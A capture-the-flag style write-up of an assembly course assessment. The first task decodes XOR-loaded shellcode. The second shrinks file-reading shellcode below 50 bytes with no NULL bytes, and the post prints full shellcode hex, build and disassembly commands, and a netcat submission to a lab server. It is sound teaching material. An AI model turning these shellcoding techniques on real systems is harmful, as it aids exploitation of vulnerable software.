This post is about the end of module assessment given for an assembly language course, that consists of 2 tasks. The first one is a simple reversing task and the second one is about optimizing shellcode.
Task 1#
For the first task, we’re given a binary called loaded_shellcode. We have to dissassemble it, modify the assembly code to decode the shellcode loaded in it, then execute it to get the flag. The decoding key is stored in the register rbx (Callee Saved)
To dissassemble the .text section :
objdump -M intel --no-show-raw-insn --no-addresses -d loaded_shellcode
The encoded shellcode is loaded by initializing the register rax with a value, then pushing it into the stack. This process is repeated 14 times. At the end, the decoding key is set into the Callee Saved register rbx.
The quickest/easiest approach would be to pop the values from the stack, xor them with the key in rbx and loop these steps 14 times. After that, load the program in a debugger and take note of the decoded value at each step. I wanted to make it just a little more fun by making a procedure that will do these steps, but will also print the entire decoded shellcode in my terminal, ready to be executed as is.
The approach I came up with is:
- pop the current stack pointer rsp into a register not used (rdx in my case)
- xor it with the value in rbx
- print the value in rdx with libc functions printf and fflush
- loop these steps 14 times
The format specifier used for printf:
outFormat db "%016llx", 0x00
- 0 : to pad the output with zeroes intead of spaces if minimum width is not met
- 16 : field width specifier of 16 characters, will be padded to the left with zeros.
- ll : length modifier long long int.
- x : lowercase hexadecimal integer
- 0x00 is the string terminator in printf
This is necessary because for example, one of the values is: 14831ff40b70148 instead of 014831ff40b70148 which would break the shellcode if I didn’t pad the extra 0.
Also, to be able to print all the values on the same line, I need to call fflush to flush all streams or else, I’d have to print on a new line instead.
Once this is all put together :
Assemble the code, do dynamic linking with libc and execute it:
nasm -f elf64 flag.s && ld flag.o -o flag -lc --dynamic-linker /lib64/ld-linux-x86-64.so.2 && ./flag
4831c05048bbe671167e66af44215348bba723467c7ab51b4c5348bbbf264d344bb677435348bb9a10633620e771125348bbd244214d14d244214831c980c1044889e748311f4883c708e2f74831c0b0014831ff40b7014831f64889e64831d2b21e0f054831c04883c03c4831ff0f05
To execute the shellcode, I’ll use the pwntools library in python:
I can then execute the shellcode, which will print the flag :
python loader.py '4831c05048bbe671167e66af44215348bba723467c7ab51b4c5348bbbf264d344bb677435348bb9a10633620e771125348bbd244214d14d244214831c980c1044889e748311f4883c708e2f74831c0b0014831ff40b7014831f64889e64831d2b21e0f054831c04883c03c4831ff0f05'
HTB{4553mbly_d3bugg1ng_m4573r}
Task 2#
For the second task, in a binary exploitation exercise, we get to the point where we have to run our shellcode. A buffer space of 50 bytes is available. The exercice consist of optimizing the given assembly code to make it shellcode-ready and under 50 bytes.
Before starting, a quick reminder about shellcoding requirements :
- Does not contain variables
- Does not refer to direct memory addresses
- Does not contain any NULL bytes
00
The provided assembly code :
Using this python code, we can generate our shellcode from the binary :
This is the current result :
python shellcoder.py flag
6a0048bf2f666c672e74787457b8020000004889e7be000000000f05488d374889c7b800000000ba180000000f05b801000000bf01000000ba180000000f05b83c000000bf000000000f05
75 bytes - Found NULL byte
Using pwn disasm we can see the instructions from the shellcode :
pwn disasm '6a0048bf2f666c672e74787457b8020000004889e7be000000000f05488d374889c7b800000000ba180000000f05b801000000bf01000000ba180000000f05b83c000000bf000000000f05' -c 'amd64'
As expected, we’re exceeding 50 bytes and the shellcode contains NULL bytes (each
Here’s the list of changes made to respect the requirements:
- Line 1: replace push 0 by xor rsi, rsi followed by push rsi. This will still push 0 to the stack and will replace mov rsi, 0 from line 13.
- Line 11: mov al, 2 to use the 1-byte register instead of the 8-byte rax.
- Line 18: replace mov rdi, rax by **mov edi, eax’ to use 4-byte size registers.
- Line 19: replace mov rax, 0 by xor al, al to set the Syscall number to 0.
- Line 21: replace mov rdx, 24 by mov dl, 24 to use a 2-byte register, per needed.
- Line 24-25: replace mov rax, 1 and mov rdi, 1 by mov al, 1 and mov dil, 1 to use 1-byte registers.
- Line 26: remove mov rdx, 24 since the value is alredy set previously.
This is the final code:
If I generate the shellcode and check for null bytes this is the result :
python shellcoder.py flag
4831f65648bf2f666c672e74787457b0024889e70f05488d3789c730c0b2180f05b00140b7010f05
40 bytes - No NULL bytes
Finally, if I send the shellcode to the server the flag is returned :
nc 94.237.63.201 58840
4831f65648bf2f666c672e74787457b0024889e70f05488d3789c730c0b2180f05b00140b7010f05
HTB{5h3llc0d1ng_g3n1u5}